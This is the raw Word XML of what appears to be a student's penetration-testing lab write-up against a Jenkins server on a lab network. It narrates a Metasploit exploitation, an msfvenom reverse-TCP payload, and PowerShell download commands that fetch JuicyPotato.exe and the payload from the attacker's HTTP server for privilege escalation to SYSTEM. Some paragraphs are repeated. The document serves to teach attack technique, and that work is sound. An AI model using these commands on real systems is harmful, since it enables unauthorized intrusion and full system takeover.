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A1A6E" w14:textId="77777777" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:t xml:space="preserve">I began by using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to scan for service versions on port 8484 of IP address 10.0.2.25. Following this, I set up a Python3 HTTP server on port 8080. After that, I utilized the Metasploit Framework (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) to configure parameters such as RHOST, RPORT, and TARGETURI for the Jenkins script console exploit. To confirm the configuration's accuracy, I used the "check" command for verification before executing the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04349FA4" w14:textId="7B22577C" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37D2EAEC" wp14:editId="100A6DC8">
            <wp:extent cx="5935980" cy="2164080"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="5222143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1A76" w14:textId="6C732E25" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="318B23FF" wp14:editId="3087FFF5">
            <wp:extent cx="5935980" cy="2659380"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="3565997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276E" w14:textId="019BB554" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:t>Inside Meterpreter, I ran the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" command, revealing my server username as "NT AUTHORITY\LOCAL SERVICE."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1F0B352" wp14:editId="1C96D4A0">
            <wp:extent cx="5935980" cy="998220"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="16137846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C27C8" wp14:editId="5FBB98A2">
            <wp:extent cx="5943600" cy="1592580"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1806514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7A5C" w14:textId="77777777" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:t xml:space="preserve">I then created a Windows x64 payload using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tool, configured to establish a reverse TCP connection to IP address 10.0.2.28 and port 4445. The resulting payload was saved as "priv.exe" in an executable format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D8D545" w14:textId="57997F36" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="352EF913" wp14:editId="474906DF">
            <wp:extent cx="5935980" cy="3489960"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="36643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743C" w14:textId="77777777" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:t>Setting up another HTTP server on port 8080 using Python3, I used a PowerShell command in the shell to transfer the "priv.exe" file to the specified location at "C:\Program Files\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jenkins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\Scripts."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C9F62B" w14:textId="6C287FFD" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66162A70" wp14:editId="3DB537BF">
            <wp:extent cx="5943600" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5245003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9754" w14:textId="77777777" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:t xml:space="preserve">In a separate terminal, I initiated a new instance of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and utilized the multi-handler exploit. I configured the payload as "windows/x64/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" and set the LHOST to "10.0.2.28" and LPORT to "4445" to match the information from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> payload. Subsequently, I executed the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BB44D6" w14:textId="77777777" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D"/>
    <w:p w14:paraId="254C9EFC" w14:textId="77777777" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:t>In my initial shell, I attempted to run ".\JuicyPotato.exe -t * -p priv.exe - 4445" command but encountered an error message: "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>createProcessWithTokenW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Failed to create proc: 5." Running the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" command returned the result "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> authority\local service."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077BE9D7" w14:textId="77777777" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D"/>
    <w:p w14:paraId="37C68ABD" w14:textId="77777777" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:t xml:space="preserve">In my second </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, I successfully established a second Meterpreter session. Upon running the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" command within this session, it revealed that my privilege level had been escalated to "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> authority/system," providing me with highly privileged access and full control over the system. In summary, my actions in the lab encompassed reconnaissance, exploitation, privilege escalation, and gaining system-level access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C53FE3" w14:textId="77777777" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D"/>
    <w:p w14:paraId="6830CF63" w14:textId="77777777" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D"/>
    <w:p w14:paraId="339106B2" w14:textId="77777777" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:t>In the shell, I employed the command "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -c "(new-object System.Net.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>).DownloadFile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>('http://10.0.2.28:8080/JuicyPotato.exe','C:\Program Files\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jenkins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\Scripts\JuicyPotato.exe')" to transfer the JuicyPotato.exe file to the specified location, C:\Program Files\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jenkins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\Scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBAAC8F" w14:textId="77777777" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D"/>
    <w:p w14:paraId="5D7AD83E" w14:textId="77777777" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:t xml:space="preserve">I generated a Windows x64 payload using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tool, configured to establish a reverse TCP connection to the IP address 10.0.2.28 and port 4445. The resulting payload was saved as "priv.exe" in an executable format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC6AAC0" w14:textId="041A9E89" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B66F109" wp14:editId="3EECC6E3">
            <wp:extent cx="5943600" cy="647700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="482574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54A0" w14:textId="77777777" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>I initiated an HTTP server on port 8080 using Python3. In the shell, I employed a PowerShell command, "(new-object System.Net.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>).DownloadFile</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>('http://10.0.2.28:8080/priv.exe','C:\Program Files\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jenkins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\Scripts\priv.exe')," to transfer the "priv.exe" file to the specified location at "C:\Program Files\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jenkins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\Scripts".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6865E6" w14:textId="61D58701" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3739EB1E" wp14:editId="27D64303">
            <wp:extent cx="5943600" cy="861060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1205074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186C" w14:textId="77777777" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D"/>
    <w:p w14:paraId="2227C86B" w14:textId="77777777" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:t xml:space="preserve">In a separate terminal, I launched a new instance of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and employed the multi-handler exploit. I configured the payload to be "windows/x64/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  <w:r>
        <w:t xml:space="preserve">" and set the LHOST to "10.0.2.28" and LPORT to "4445" to match the information from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> payload. Afterward, I executed the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B407AE6" w14:textId="77777777" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D"/>
    <w:p w14:paraId="23B7B514" w14:textId="77777777" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:t>In my initial shell, I executed the ".\JuicyPotato.exe -t * -p priv.exe - 4445" command. However, I encountered an error message: "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>createProcessWithTokenW</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Failed to create proc: 5." When I ran the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" command, it returned the result "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> authority\local service."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AA8CEB" w14:textId="0A3745F1" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43FDB9B0" wp14:editId="2B0216F4">
            <wp:extent cx="5935980" cy="1798320"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="82094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E63D" w14:textId="77777777" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:t xml:space="preserve">In my second </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, a second Meterpreter session was successfully established. When I ran the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" command within this session, it revealed that my privilege level had escalated to "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> authority/system," granting me highly privileged access with full control over the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6149AE51" w14:textId="26D71BAD" w:rsidR="0074274D" w:rsidRDefault="0074274D" w:rsidP="0074274D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77C95BF7" wp14:editId="03C139E8">
            <wp:extent cx="5943600" cy="1607820"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="201225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EFB460" w14:textId="77777777" w:rsidR="00C5124F" w:rsidRDefault="00C5124F"/>
    <w:sectPr w:rsidR="00C512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74D"/>
    <w:rsid w:val="0074274D"/>
    <w:rsid w:val="00C51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51817F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F006761A-3976-443D-A570-B2EB0092C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74D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9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566</Words>
  <Characters>3119</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>25</Lines>
  <Paragraphs>7</Paragraphs>
  <ScaleCrop>false</ScaleCrop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 Rodas</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Wilber Rodas</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-11T01:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-11T01:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>